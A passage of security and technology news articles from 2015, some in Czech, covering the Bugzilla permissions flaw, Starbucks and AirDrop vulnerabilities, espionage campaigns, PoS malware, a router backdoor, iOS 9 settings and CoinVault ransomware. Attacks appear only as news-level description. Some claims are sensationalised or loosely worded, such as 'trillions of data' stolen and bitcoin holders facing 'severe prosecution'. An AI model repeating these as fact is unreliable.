So, anyone who uses Bugzilla and its email-based permissions is affected, including popular free software projects such as Apache Project, LibreOffice and Red Hat.
Incredibly Easy to Exploit
According to the researchers, the vulnerability is "incredibly easy to exploit." To exploit the vulnerability, all an attacker need is to register for a regular account via email and trick the system into believing that the attacker is part of a privileged domain.
This causes the system into believing that the attacker is part of a privileged domain and grant domain-specific permissions.
"The implications of this vulnerability are severe," PerimeterX's security researcher Netanel Rubin wrote in a blog post. "It could allow an attacker to access undisclosed security vulnerabilities in hundreds of products… Imagine the hundreds or thousands of zero-days and other security vulnerabilities that could potentially be exposed."
Rubin said the flaw was tested on Mozilla's and found that all Perl-based Bugzilla versions, including 2.0 to 4.2.14, 4.3.1 to 4.4.9, 4.5.1 to 5.0, were vulnerable at the time of the report.
It's not clear whether the Bugzilla vulnerability has been used by malicious hackers to gain access to more unpatched vulnerabilities.

Researchers to Develop Long-Lasting Solid-State Batteries

Whenever you go to Buy any Electronic Gadget — Phone, Tablet, Laptop, Watch — the most important specification isn’t its processor speed or its camera quality. It’s how long the device’s battery backup is.
Imagine easy access to such batteries that provide more battery power after charging it once, do not give up in less time and have a life of many years.
Researchers to Develop Long-Lasting Solid-State Batteries
To achieve this, the researchers at Massachusetts Institute of Technology (MIT) and Samsung, have developed a new material that could potentially revolutionize the Battery industry.
Researchers have solved all these Battery issues with just one weird practical approach, called Solid-State Electrolytes.
Today the cells we depend on contain Liquid-State Electrolyte, the researchers thought of replacing the one with a Solid form of electrolyte.
Solid-State Electrolytes could simultaneously address the greatest challenges associated with improving lithium-ion batteries (LIB), with the possibility to increase storage, battery life, and the safety of batteries.
The Researchers found that the solid materials that could conduct ions fast enough to be useful in a battery and now mainly focussed on:
The development of materials for clean energy.
Wanted the devices’ battery to last for an indefinite period.
Importance of safety of batteries that are currently being faced by many of us.
“The electrolyte in such batteries, typically a liquid organic solvent whose function is to transport charged particles from one of a battery’s two electrodes to the other during charging and discharging — has been responsible for the overheating and fires that, for example, resulted in a temporary grounding of all of Boeing’s 787 Dreamliner jets,” one of the researcher explains.
But, the batteries based on Solid-State Electrolyte are also Safe, as liquid electrolytes are the main reason batteries catch on fire.
"The initial findings focused on a class of materials known as superionic lithium-ion conductors, which are compounds of lithium, germanium, phosphorus, and sulfur, but the principles derived from this research could lead to even more effective materials" the team says.
Be it a laptop, electric car, camera or a cell phone, Li-ion battery is found in every product as they give an advantage of recharging the same battery instead of replacement.
“With a solid-state electrolyte, there’s virtually no degradation reactions left” — meaning such batteries could last through “hundreds of thousands of cycles.”
To know more, visit the official MIT newsroom.
In the past, many other researchers have attempted to find a solid replacement for the liquid electrolyte, but this group is the first to show that this can be done in a formulation that fully meets the needs of battery applications.
The research will result in the making of a “Power Packed” battery.
Moreover, with an objective of increasing the battery life, Apple also plans to build Fuel cell batteries that are capable of charging any Apple device for many days without a recharge.

Beware Coffee Lovers! StarBucks Exposed you to 3 Critical Vulnerabilities

Beware Coffee Lovers! StarBucks Exposed You to 3 Critical Flaws
Ever registered on StarBucks website? Change your passwords now!
If you are one of those Millions Starbucks customers who have registered their accounts and credit card details on StarBucks website, then your banking details are vulnerable to hackers.
An Independent Security Researcher, Mohamed M. Fouad from Egypt, has found three critical vulnerabilities on StarBucks website that could have allowed attackers to take over your account in just one click.
The vulnerabilities include:
Remote Code Execution
Remote File Inclusion lead to Phishing Attacks
CSRF (Cross Site Request Forgery)
Stealing Credit Cards Details
In case of Remote File Inclusion flaw, an attacker can inject a file from any location into the target page, which includes as a source code for parsing and execution, allowing attacker to perform:
Remote Code Execution on the company's web server
Remote Code Execution on the client-side, potentially allowing attacker to perform other attacks such as Cross-Site Scripting (XSS)
Data theft or data manipulation via Phishing attacks in an attempt to hijack customers' accounts containing credit cards details
Hijacking Starbucks Store Account Using CSRF
CSRF or Cross-Site Request Forgery is a method of attacking a website in which an intruder masquerades as a legitimate user. All attackers need to do is get the target browser to make a request to the site on their behalf, if they can either:
Convince users to click on their HTML page
Insert arbitrary HTML in a target site
In this case, an attacker can use CSRF to trick a victim into clicking a URL that changes user's store account information including account password.
This could allow the attacker to hijack victims' accounts, delete accounts or change victims' email addresses.
Video Demonstration
Fouad has also provided a video demonstration as a Proof of Concept to show the attack in work. You can watch the video given below:

In a white-hat style, Fouad reported the critical flaws to StarBucks twice but didn't get any reply from the team.
Fouad then reported the same flaws to US-CERT, which confirmed the vulnerabilities that were fixed by the StarBucks team nearly ten days ago.
However, Fouad is still waiting for the reply and his bug bounty from StarBucks team, as the company started the bug bounty program just two months ago.

Bugzilla CVE-2015-4499 flaw, be aware hackers could know all your bugs

A Critical vulnerability affects Mozilla Bugzilla bug-tracking software could be exploited to access details of non-public vulnerabilities stored in its database.
The open source Bugzilla bug-tracking system is used hundreds of thousands of software organizations that track the evolution of software bugs discovered in their applications.

Development team urge to upgrade Bugzilla bug tracking system to fix the critical flaws, last version available for the popular application is the 5.0.1, 4.4.10, or 4.2.15.

The bug in Bugzilla is considered critical due to the sensitive data are managed by such kind of application, a data breach could expose information on non-public vulnerability to the hackers that could use them in cyber attacks.

The experts at PerimeterX security firm which disclosed the vulnerability, coded as CVE-2015-4499, explained that the flaw resides in the Bugzilla’s email-based permissions process that could allow an attacker to gain high-level permissions on the popular Bugzilla bug-tracking software.
“The implications of this vulnerability are severe – it could allow an attacker to access undisclosed security vulnerabilities in hundreds of products, in a manner similar to the Mozilla major data leak in August this year, only multiplied by the thousands of publicly available Bugzilla deployments. Imagine the hundreds or thousands of zero-days and other security vulnerabilities that could potentially be exposed!”
An attacker can easily breach unpatched Bugzilla database, among the illustrious organizations that use the bug tracking system there are the Apache Project, Red Hat and LibreOffice.
The researchers explained that the vulnerability is “extremely easy to exploit,” the attackers just need to register for a regular account via email and trick the system into believing that the attacker is part of a privileged domain which allow it to gain domain-specific permissions.

“If you are using email based permissions in your Bugzilla deployment and have not yet installed a patched version, take it down until patched. Make sure to go over the logs and user-list to identify users that were created using this vulnerability. This vulnerability is extremely easy to exploit and the details have been known for more than a week, you have been or will be attacked!” explained
The researchers tested the flaw on Mozilla’s and found that all Perl-based Bugzilla versions, including 2.0 to 4.2.14, 4.3.1 to 4.4.9, 4.5.1 to 5.0, were vulnerable.

“This vulnerability has been tested and found working on
– the Bugzilla for the Mozilla Foundation. Upon successful exploitation of the vulnerability we were granted permissions that would have potentially allowed us to view confidential data (see screen capture below). ” states the post.
bugzilla permissions

At the time I’m writing there are no information whether the Bugzilla vulnerability has been exploited in the wild to gain access to non-public vulnerabilities.

Microsoft propojuje své služby správy identit s Googlem i Facebookem

18.9.2015 Zabezpečení
Microsoft rozšiřuje Azure Active Directory, službu pro správu identit a řízení přístupu pro lokální i cloudové aplikace. Nově ji propojil s populárními aplikacemi googlovské sady, ale také s Facebookem.

Podle Gartneru je Azure AD předním produktem sloužícím společnostem k ověřování identit zaměstnanců. Podle dat Microsoftu ho aktuálně využívá kolem šesti milionů zákazníků.

I proto se ho rozhodl rozšířit tak, aby společnosti mohly ověřovat identity nejen zaměstnanecké, ale rovněž svých zákazníků a obchodních partnerů.

„Poskytnout bezpečnou platformu pro ověřování totožnosti, jejíž funkčnost bude opřená i o zákazníky oblíbené aplikace, je zásadním krokem pro udržení jejich důvěry, spokojenosti a věrnosti,“ uvádí viceprezident Microsoftu Brad Anderson v příspěvku na svém blogu, v němž novinku oznamuje.

A jako příklad uvádí spolupráci s fotbalovým gigantem Real Madrid, který novou službu testuje na svých produktech. Jeho fanoušci se tak nově můžou přihlašovat do klubových mobilních aplikací prostřednictvím facebookového loginu.

Microsoft zároveň ohlásil takzvanou Active Directory B2B Collaboration. Rozšíření umožňující společnostem ověřovat identitu svých obchodních partnerů.

„Díky těmto novým funkcím můžou společnosti snadno prohlubovat důvěru a vztahy mezi uživateli Azure AD, takže můžou pohodlně sdílet obchodní aplikace napříč firmami, aniž by museli zřizovat další sdílené adresáře nebo se dál zabývat správou partnerských identit,“ uvádí dále Anderson.

Obě nové funkce už jsou k dispozici, ačkoliv Microsoft neoznámil jejich přesnou cenu. Ta by tak měla být úměrná jejich využití, tedy podle počtu spravovaných identit.

A dangerous silent AirDrop attack is threatening Apple users

A new evil vulnerability affecting the AirDrop service could be exploited by attackers to silently infect iPhones and Apple Macs.
Versions prior to the latest Apple OS version, the newborn iOS 9, are affected by a serious AirDrop Bug. The AirDrop Bug could be exploited by hackers to take full control of Apple iPhone or Mac machines.

The AirDrop Bug has been disclosed by the Australian security researcher Mark Dowd, AirDrop is a proprietary service that enables the transfer of documents among supported Macintosh computers and iOS devices.

The AirDrop bug allows anyone within the range of an AirDrop user to silently install a malware on the targeted Apple device by sending an AirDrop file which causes rebooting of the target. The vulnerability affects iOS versions supporting the AirDrop from iOS 7 onwards, as well as Mac OS X versions from Yosemite onwards.

Airdrop menu_iOS

The principal problem for Apple users is that an attacker can exploit the AirDrop bug even if the victim rejects the incoming file sent over AirDrop.
After rebooting the device, the malware gains access to Springboard, the Apple’s software to manage iOS home screen, allowing the malicious app to masquerade the rights granted to the bogus application.

These rights include access to:

and many more…
It is clear that by having access to the above features of the phone, the attacker can fully compromise the victim’s device.

Below a video PoC of the AirDrop bug exploitation published by Dowd, the video shows an attack on an iPhone running iOS 8.4.1.

Airdrop menu_iOS

The AirDrop bug has been fixed in the last iOS 9 that comes with a sandbox mechanism implemented by Apple that block attackers for writing files to arbitrary locations on the device via AirDrop service.

Waiting for a complete patch to fix the issue, Apple users urge to Update to iOS 9 and Mac OS X EI Capitan, which are in imminent outgoing.

Operation Iron Tiger, hackers target US Defense Contractors

Experts at Trend Micro uncovered the Operation Iron Tiger, a cyber espionage campaign carried out by Chinese hackers on United States Defense Contractors.
Security experts at Trend Micro have uncovered a new targeted attack campaign dubbed Operation Iron Tiger. Threat actors behind the Operation Iron Tiger have stolen trillions of data from defense contractors in the US. Stolen data include intellectual property, including emails and strategic planning documents and many other highly confidential information that could be used by attackers to destabilize an organization.

The experts speculate that the Iron Tiger Operation was carried out by the China-based group dubbed “Emissary Panda.”

“Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of data from defense contractors in the US, including stolen emails, intellectual property, strategic planning documents—data and records that could be used to destabilize an organization.” states a blog post published by Trend Micro.

Operation Iron tiger
Operation Iron tiger

In August 2015, researchers at Dell discovered that the Panda Emissary group used Watering hole attacks as the attack vector, they compromised websites popular with a target organization’s personnel.

The Panda Emissary (also known as TG-3390) targeted high-profile governments and organisations searching for defence aerospace projects.

The group is active at least since 2010 targeting organization in APAC, but since 2013 it is attacking high-technology targets in the US.

The experts consider the Panda Emissary a “highly competent and sophisticated group“, Trend Micro revealed to have seen them steal up to 58 GB worth of data from a single target.

“The Iron Tiger actors can be skilled computer security experts but sparingly used advanced techniques, given their weakly protected target networks. They do not follow a specific schedule when it came to launching attacks. Instead, they prioritize attacks based on a list of chosen targets.” states the experts.
The attackers used spear-phishing emails to carry on the attacks, the experts at Trend Micro analyzed in detail the accounts used by the hackers and the composition of the email messages (i.e. subject, language, message).

Trend Micro published a detailed report on the Operation Iron Tiger, the investigation allowed the experts to analyze the TTPs (Tactics, Techniques and Procedures of the threat actor.

Below the key findings of the report:

The group’s use of exclusive hacking tools and malware, such asdnstunserver, PlugX, Gh0st, to name a few
The threat actor group’s use of public resources as Blogspot™ and the Google Cloud Platform™
The group patched one of their compromised servers to avoid being hacked
Key identification elements leading to at least one individual physically located in China
The use of code-signing certificates of Korea-based security company SoftCamp Co., Ltd.
The group’s list of targets, which include military defense contractors, intelligence agencies, FBI-based partners, and the US government
Their use of a unique method to intercept Microsoft Exchange credentials

The DUKES APT – 7 years of Russian state sponsored hacking


F-Secure has published an interesting report on the cyber espionage operations conducted by the Dukes APT group, which appears linked to the Kremlin.
Security researchers at F-Secure have published an interesting report detailing the cyber espionage operation of a Russian APT group, dubbed the Dukes, the experts speculate the group is backed by the Russian government. The Dukes group has been active since at least 2008 targeted governments, political think tanks and many other organizations, including criminal organizations operating in the Russian Federation.

The hacking crew is very sophisticated, its operations leveraged on “zero-day” exploits developed by its members.

“The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making.” states the executive summary of the report. “The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks and governmental subcontractors,” “Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen terrorism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.”

The Dukes group is responsible of a large number of high-sophisticated campaigns, security experts have detected an impressive amount of malware toolsets in their arsenal, which include MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke.

The first known targets of the Dukes were associated with the Chechen separatist movement, the hackers used PinchDuke malware to compromise the victims’ systems, but a few months later in 2009, experts collected evidence of the involvement of the Dukes in cyber attacks against the Western governments and organizations.

The Dukes malware

The Dukes malware

The researchers at F-Secure have collected many evidence that suggest the Russian origin of The Dukes group, the level of sophistication of their malware and the nature of the targets suggests the involvement of the Russian Government. All the targeted organizations manage information of interest for the Russian government, in April 2014 researchers at F-Secure analyzed a number of documents referring political issues like the crisis in the Ukraine or NATO informative in the attempt to circumvent the victims. F-Secure reported, for example, the existence of a bogus document signed by Ruslan Demchenko, the First Deputy Minister for Foreign Affairs of Ukraine.

Miniduke Ukraine document 2

Miniduke Ukraine document 2

The source code analyzed by F-Secure contains a number of Russian-language artifacts, in one case the researchers found also an error message that support the attribution. The GeminiDuke also used timestamps that were set at the Moscow Standard time.

In the PinchDuke malware the hackers discovered the following message:

“Ошибка названия модуля! Название секции данных должно быть 4 байта!” (which translates essentially as “Error in the name of the module! Title data section must be at least 4 bytes!”).

“the benefactors of the Dukes is so powerful and so tightly connected to the group that the Dukes are able to operate with no apparent fear of repercussions on getting caught. We believe the only benefactor with the power to offer such comprehensive protection would be the government of the nation from which the group operates. We therefore believe the Dukes to work either within or directly for a government, thus ruling out the possibility of a criminal gang or another third party” states the report published by F-Secure.

The experts at F-Secure seems to have no doubt about the abilities of The Dukes group and their well-coordinated organization that benefits of financial resources out of the ordinary.

“We therefore believe the Dukes to be a single, large, well-coordinated organization with clear separation of responsibilities and targets.”

Give a look to the report “THE DUKES 7 years of Russian cyberespionage” I have found it really amazing and full of precious information.


Security issues in DHS systems potentially exposes confidential data at risk


Despite DHS components have strengthened coordination in performing their cyber missions a recent audit made by the OIG has found several security issues.
Among the missions assigned to the DHS there is the coordination of activities related to the prevention, mitigation and recovery from cyber incidents, the Department also oversees the IT security of the US Government.

The DHS is supported in these critical activities by three agencies: the US Immigration and Customs Enforcement (ICE), the National Protection and Programs Directorate (NPPD), and United States Secret Service (USSS).

The intense collaboration between the agencies is crucial to ensure the Homeland Security.

DHS core responsibilities

DHS core responsibilities

After this premise, let me show you the results of a report released on Tuesday by the Department of Homeland Security’s Office of Inspector General (OIG). The audit , conducted by the OIG, called for improved coordination between DHS agencies in order to meet cyber threats in order to avoid serious cyber incidents.

According to the report “DHS Can Strengthen Its Cyber Mission Coordination Efforts ” published by the OIG, DHS and above components have taken significant steps to improve the information sharing and respond to the cyber attacks in an effective way.

However, the OIG discovered several security related a lack of coordination with existing policies and the organization of a Department-wide Cyber Training Program.

Without developing the department-wide training program, internal staff is not able to perform correctly their assigned incident response duties or investigative responsibilities in the event of a cyber incident.

“Despite these positive steps, the Department can take additional actions to improve its cyber mission coordination. For example, CIR has not developed a cyber strategic implementation plan due to its recent establishment and limited staff. Without a strategic plan, DHS cannot effectively align the components’ cyber responsibilities and capabilities with DHS’ overall mission.” states the report.

“Further, DHS needs to establish a cyber training program to provide its analysts and investigators with the skills needed to effectively perform their duties at ICE, NPPD, and USSS. An automated cyber information sharing tool is needed to enhance coordination among the components. Moreover, deficiencies we identified in ICE and USSS’ implementation of DHS baseline configuration settings, vulnerability management, weakness remediation, and specialized security training as required may result in loss, misuse, modification, and unauthorized access of the Department’s information systems and data.”

The OIG also discovered a number of vulnerabilities affecting the internal websites of ICE and USSS. The flaws include cross-site scripting (XSS), cross-site request forgery (CSRF), information leakage, session fixation, and command injection flaws.

The ICE failed to implement configuration settings on Cyber Crimes Center (C3) servers and workstations exposing sensitive data to the risk of cyber attacks.

The OIG already reported the flaws to the internal agencies, some of the security issued discovered in the audit had been already resolved, but OIG is still not completely satisfied with the result obtained by the components and their IT staff.

MWZLesson POS Trojan borrows code from other malware

Security experts at Doctor Web have discovered a new PoS Trojan dubbed MWZLesson that borrows code from other popular malicious software.
Security experts at Dr. Web have discovered a new PoS Trojan that was designed by mixing code from other malware.

The new PoS Trojan, dubbed Trojan.MWZLesson, was designed reusing the code of other popular malware, including the Dexter PoS and the Neutrino backdoor.

“This code was borrowed from another Trojan designed for POS terminals and named Trojan.PWS.Dexter. The malware sends all acquired bank card data and other intercepted information to the command and control server.” states the blog post published by Dr. Web.

Dexter malware PoS Trojan

Like its predecessors, MWZLesson compromises the POS terminals, scraping the RAM memory to search for credit card data. Once infected the PoS system, the malware communicates with the server over the HTTP protocol, it steals card data and sends it to the command and control server through GET and POST requests.

“Trojan.MWZLesson can intercept GET and POST requests sent from the infected machine’s browsers (Firefox, Chrome or Internet Explorer). Such requests are forwarded to the command and control server run by cybercriminals.” continues the post.
Trojan.MWZLesson can update itself, download and run additional files, find specific documents, and even mount an HTTP Flood attack.

The experts at Dr.Web discovered that the Trojan.MWZLesson also implements features to avoid detection and eradicate other malware that infected the PoS malware.

“Trojan.MWZLesson checks for virtual environments and debuggers and gather information on the infected machine. The newly discovered PoS malware is able to remove other malware present on the machine and is able to exfiltrate different kinds of data.”

The discovery of the Trojan.MWZLesson confirms the great interest of the criminal crews in infecting POS terminals and their abilities in recyclying code of older and efficient malware.

The Differences between Targeted Attacks and Advanced Persistent Threats

Although Advanced Persistent Threats and Targeted Attacks are often confused, in their core these are two different things in the field of online security. Most businesses out there need only worry about one of these two types of attacks, focusing their efforts to remain thoroughly protected against both enemies and threats.
Many people get confused over the terminology of online threats, such as Targeted Attacks and APTs (which stands short for Advanced Persistent Threats). However, when it comes to comparing these two, there is nothing that should confuse you. On the contrary, the differences are substantial and this is what we are going to highlight in this article.

First of all, when we talk about Advanced Persistent Threats, we generally refer to the targeted attacks held by nations and states. This means that these attacks had been meticulously designed and programmed, so as to do what they were supposed to. There are web developers (and most likely lots of them) that work behind Advanced Persistent Threats. So, their design is impeccable most of the times and the results are pre-determined. No room for mistakes, in the scenario of intelligence agencies aiming at doing harm and gaining access to sensitive data.

The cost is high, as you can imagine – with such preparation and with so many brilliant minds building something, and the chances that the outcome will be brilliant, too!

On the contrary, Targeted Attacks are the most common threats that most businesses and individuals encounter. They are not designed by the intelligence agencies and they do not require such a great budget. There is no sole goal that derives from these attacks, as the people behind them can either seek to gain access to credit card credentials or just cause mayhem, get their hands on personal information for blackmail and so on.

north korea hackers Advanced Persistent Threats

Even if it is good for the media and the advertising campaigns to confuse people and put both of these threats (meaning the Advanced Persistent Threats and the Targeted Attacks) under the same veil of mystery, this is not the case. Instead, the former is not for people to lose their sleep over – the latter is what they should be focusing on.

The truth behind this confusion has to do with the aim of IT security departments and cybersecurity companies to get excuses for not fighting off threats. If the enemy is regarded as gigantic (with the funds and the power of nations and agencies), failure is much easier to tackle with. However, everybody needs to understand that each threat can be proven a handful and there needs to be prudent strategy and dedication for dealing with it.

Written by: Ali Qamar, Founder/Chief Editor at

Author Bio:
Ali Qamar is an Internet security research enthusiast who enjoys “deep” research to dig out modern discoveries in the security industry. He is the founder and chief editor at Security Gladiators, an ultimate source for cyber security. To be frank and honest, Ali started working online as a freelancer and still shares the knowledge for a living. He is passionate about sharing the knowledge with people, and always try to give only the best. Follow Ali on Twitter @AliQammar57

How to Detect IE Zero-day Exploit Used to Deploy Korplug Malware

Recently, Microsoft issued an Emergency patch for a zero-day vulnerability in Internet Explorer that is being exploited to deploy Korplug malware on vulnerable PCs.
Korplug, a known variant of PlugX, is a Trojan that creates a backdoor used for information stealing on infected computers.
In one of the most publicized cases, an evangelical church in Hong Kong was compromised to deliver the malware. Attackers were able to breach the church’s website and inject a malicious iFrame overlay designed to look like the site itself.
The iFrame was then used to redirect visitors to a site hosting the IE exploit. Once users land on the website, they are served a java.html which installs Korplug on their computers.
To defend against Korplug, system administrators, and security engineers should educate users of corporate assets about these types of hacking techniques.
In many cases, organizations are breached because of the lack of internal education around how to identify threats.
All too often breaches are successful when users execute malicious email attachments, download files from suspicious websites, or install cracked software.
However, even with the right kind of education, users will still sometimes inadvertently compromise company assets.
This usually occurs when a user accidentally exposes the network to a piece of malware posing as a legitimate spreadsheet, word doc in an email, or in the case of the evangelical church described above, an iFrame designed to look like a page in a website.
Impact on You
Acting like a backdoor, malware like Korplug can be used by an attacker to have complete control over a user’s computer.
This allows the attacker to create privilege escalation, exfiltrate data on the user’s machine, or act as a pivot point to access more sensitive systems.
How AlienVault Can Help
AlienVault Unified Security Management (USM) provides asset discovery, threat detection (IDS), vulnerability assessment behavioral monitoring and SIEM in a single console, plus weekly threat intelligence updates developed by the AlienVault Labs threat research team.
The Labs team has released IDS signatures and a correlation rule to the AlienVault USM platform so customers can identify activity related to Korplug.

​SYNful Knock: Backdoor Malware Found in Cisco Routers


Mandiant, a FireEye sister concern has been involved in researches related to cyber defense.
In their recent findings, a backdoor malware named SYNful Knock identified as the one compromising the principles of Cisco routers with features such as...
...Having an everlasting effect, i.e. Serious Persistence.
What?- The malicious program is implanted in the router illicitly through the device’s firmware (regardless of the vendor). The goal is achieved by modifying the router's firmware image, which exists even after the device gets a reboot.
How?- installing SYNful Knock in Cisco 1841 router, Cisco 2811 router, and Cisco 3825 router.
Affected areas- 14 instances in 4 countries including India, Mexico, Ukraine, and the Philippines.
Impact- the backdoor is backed up with such abilities that can compromise the availability of other hosts and access to sensitive data in an organization.
“The theoretical nature of router-focused attacks created a mindset within our industry to focus on building more walls around the perimeter, leaving many organizations exposed when it comes to foundational devices like routers,” stated FireEye.
With this statement, we can imagine how dangerous is this backdoor!
As the implant is triggered by modifying the Cisco Inter-networked operating system (IOS), thus the implant activates in-capabilities in the Cisco victim like:
It allows the attacker to install various functional modules from the anonymity of the internet.
It provides unrestricted access using a wrapped backdoor password.
It delivers modules via the HTTP protocol and not HTTPS.
The controller (attacker) enables the TCP packets have a non-standard sequence and corresponding acknowledgment numbers.
The modules are disguised as independent executable code or hooks within the router’s IOS with functionality similar to the backdoor password.
The backdoor password provides access to the router through the console and Telnet.
Also, The Hacker News (THN) reported about vulnerabilities in Belkin routers leading to privilege escalation and cyber attacks like man-in-the-middle attack. This is considered as an evident example where routers are being compromised on a large level.
Besides this, a document stating possibilities of how Cisco’s IOS can be compromised and side-by-side protected against any malware can be seen here.
To get insights of this stealthy malware visit the stepwise demonstration executed by Mandiant.

World's 9 Biggest Banks to adopt Bitcoin's Blockchain Technology
Nine of the World’s renowned Banks, including JPMorgan, Royal Bank of Scotland, Goldman Sachs and Barclays, are collaborating with New York-based financial tech firm R3 to create a new framework based on Bitcoin’s Blockchain.
Yes, they are back in the game yet again, but this time officially!
Blockchain — the public and decentralized ledger technology that underpins all Bitcoin transactions has been now recognized as “the future for financial services infrastructure”.
The blockchain technology is a way of keeping records by listing the owner’s name with all the previous and present transaction the client was involved. It is a public ledger where a list of all the transactions ever executed is maintained.
The Banks are planning to develop and implement Blockchain-like Technology where distributed/shared ledger standards are going to replace (for better, of course) the current ledger transactions.
The idea behind such an initiative is to maintain the financial records securely without any central authority by adopting the Decentralized Blockchain technology.
The potential benefits of blockchain technology to banking institutions are almost innumerable, for example, this technological innovation is considered more safe and secure when compared to the conventional methods currently in use.
The Name of the Banks teaming up are:
JP Morgan
Commonwealth Bank of Australia
Goldman Sachs
Royal Bank of Scotland
Credit Suisse
State Street
Blockchain has tremendous potential to revolutionize the transaction systems used by Banks.
Blockchain is Revolutionary, Not the Bitcoins!
After coming out of this news, for banks it seems like blockchain technology is considered good but the Bitcoins still a “NO”.
"These new technologies could transform how financial transactions are recorded, reconciled and reported – all with additional security, lower error rates and significant cost reductions," said Hu Liang, Senior Vice President and Head of Emerging Technologies at State Street.
Further Liang said, "R3 has the people and approach to driving this effort and increase the likelihood of successfully advancing the new technology in the financial industry."
The current rate of 1 Bitcoin (BTC) equals $230 (USD), in the recent past bitcoins were tagged as illegal currency and whoever found with the digital currency had to face severe prosecution.
The inoperability of Bitcoins was because of its usage in the conduct of illegal activities and being prime accused in triggering various cyber attacks.
This new alliance of banks will change the face of many financial activities, as the adopted bitcoin technology is supposed to save time and money by being more secure as well.
By taking the blockchain feature of bitcoins, the banks are going to prepare a separate standard. Therefore, they must bring this feature to the world only after undergoing strict testing methodology.

For Better Privacy & Security, Change these iOS 9 Settings Immediately
The new iOS is better, faster, and more efficient than its predecessors, with a number of new features and improvements including enhanced multitasking for iPad, Proactive Assistant Siri, new Low Power mode, Transit directions in Maps and many more.
You need to download iOS 9 right away. But, after installing it on your iOS device, you should immediately change these security settings to protect your privacy.
Besides various new features, iOS 9 also comes with a handful of security and privacy improvements.
So, before doing anything like loading new apps, customizing your phone, or syncing your data, you need to check these settings – and if necessary, changed.
1. Locking the Door
Boost iOS 9 Security by Setting a Longer 6-digit Passcode
When you set up an iOS device, you are asked to create a passcode to encrypt your entire iPhone or iPad storage. The passcode is your device key that protects your device and its data from others.
This passcode was limited to just four digits, but iOS 9 adds the ability to use a 6-digit passcode, which makes your iPhone or iPad far more secure.
If you have already set a passcode on your device, Go to Settings > Touch ID & Passcode, and enter your existing 4-digit passcode.
If not, Go to Settings > Touch ID & Passcode, select Turn Passcode On, and select Passcode Options. This provides you options for Custom Alphanumeric Code, or Custom Numeric Code, or the older Four-Digit Numeric Code.
2. Disable Tracking
Limit Certain Apps from Tracking your Location in the Background
Some applications that tell you the weather, or Apple's Maps, actually needs your location data using your iOS device's GPS, and/or Wi-Fi.
But what about apps such as Facebook that uses your location in the background, even if you are not actively using the app?
Today everybody is interested in tracking you, your location, your activities,...everything about you. So, you need to turn off location services for these apps in your device's settings.
If you see these kinds of pop-ups and other notifications from the app, the app wants to use your location. For perfect privacy, select Don't Allow and do this whenever asked by different apps. This will limit an app's function.
3. Search with Do-Not-Track Service
Change your Search Setting to a DuckDuckGo
Google's Chrome, Microsoft's Bing and Yahoo have all being accused of tracking users, but the new search engine DuckDuckGo, available since iOS 8, is known for not tracking its users, their keystrokes, or their entries.
To enable, Go to Settings > Safari > Search Engine, select DuckDuckGo as your default search engine while using Siri, Safari, or other apps.
4. Don't let Apps took over your Personal Data
Prevent Apps from Uploading your Data
Contacts, Calendar, Reminders, Emails, and Photos, are something most personal for everyone. If an app wants these type of information, either for processing or uploading, it will ask you the first time.
For perfect privacy, you can change access of each app manually by going to Settings > Privacy and select any app, and then switch ON or OFF button, depending on which third-party apps you want to give access to.
Remember: If you have already given an app access to your personal data, switching OFF the service doesn't solve the problem. The service will not delete your data, for this you’ll have to contact that specific app maker.
5. Add an Extra Layer of Security
Enable Fingerprint Security with Touch ID
You can enable Fingerprints and Thumbprints to secure your iPhone or iPad.
To enable, Go to Settings > Touch ID & Passcode and enroll your fingerprint or thumbprint. However, make sure that you have enabled the Phone Unlock setting.
6. Enable 'Find My iPhone'
Keep your Hands Tight on your iPhone or iPad in case you Lost it
Find My iPhone locates your device on a map if it's lost or stolen.
For enabling, Go to Settings > iCloud > Find My iPhone (or iPad) and Switch it ON. You may require entering the passcode of your device to authorize this.
Moreover, you can also select Send Last Location, this will send your device's last location to Apple's servers just before your device powers down.
Note: In case, you don’t want Apple to track you, we advise you to disable this feature.
7. Make your Purchases Secure
Require password with every app purchase
For financial security, ensure that each app requires your Apple ID or your fingerprint to prevent multiple purchases being made on your payment card after your authorization.
You’ll be displayed the above prompt, select Always Require.
8. Change Your Default Wi-Fi Hotspot Password
Close the Doors for Outsiders Stealing Away your Internet
Despite iOS 9 comes with a stronger default password for your Personal Hotspot, it is a good practice to change your default password with an even stronger string of password.
You are advised to include letters, numbers, as well as special characters in your password to make it difficult for others to crack.
9. Stay Away Advertisers!
Limit advertisers tracking your location, data
Safari also got a small makeover in iOS 9 with even more privacy-related tweaks. One such recent privacy setting is blocking advertisement cookies and trackers.
Go to Settings > Privacy > Advertising and then enable the Limit Ad Tracking option. From here, tap the Reset Advertising Identifier option, and then accept any prompts.
You can also prevent iPhone location-based tracking, as some services track you for location-based advertisements and alerts, and for boosting your cell coverage.
Just head on to Settings > Privacy > Location Services > System Services and select the services that you wish to disable.

Coinvault, are we reaching the end of the nightmare?

The ransomware sequel: alternative ways of profit harvesting
17.9.2015 Zdroj : Kaspersky

A day after we published our No Ransom Campaign decryptor in the fight against the CoinVault ransomware, we were contacted by a fellow researcher from Panda, Bart Blaze. He kindly suggested that new variants of this dreadful ransomware were available and that he would happily share them with us. After obtaining the new MD5 hashes for the files, we set out to find more clues, more files, and to analyse what these new malware variants had to reveal: three malware families that had striking similarities with each other.



In the end we found some interesting surprises (for more details about what we found, please read on).

However, the best thing was that, based on our analysis, the National High Tech Crime Unit of the Dutch police was able to apprehend two suspects last Monday.

The story begins with CoinVault

Our search began with the discovery of the first version of CoinVault, in May 2014 (please see the table at the bottom of this post for MD5s and additional information on this, and other, hashes). Interestingly enough, this sample did not run on every computer, so we have omitted any further analysis of this version here.

Then suddenly there was Comhost

Two months after we detected the initial version of CoinVault, we detected two near-identical samples. The two files differed only in how the malware was unpacked and executed from the resource section in the binary.

Both binaries loaded the same payload, an executable known as ‘comhost.exe’. Comhost was completely different from CoinVault in terms of functionality. While CoinVault fell into the category of traditional ransomware (until this point, at least), Comhost was more of an infostealer. If you cannot wait to find out more, please skip forward!

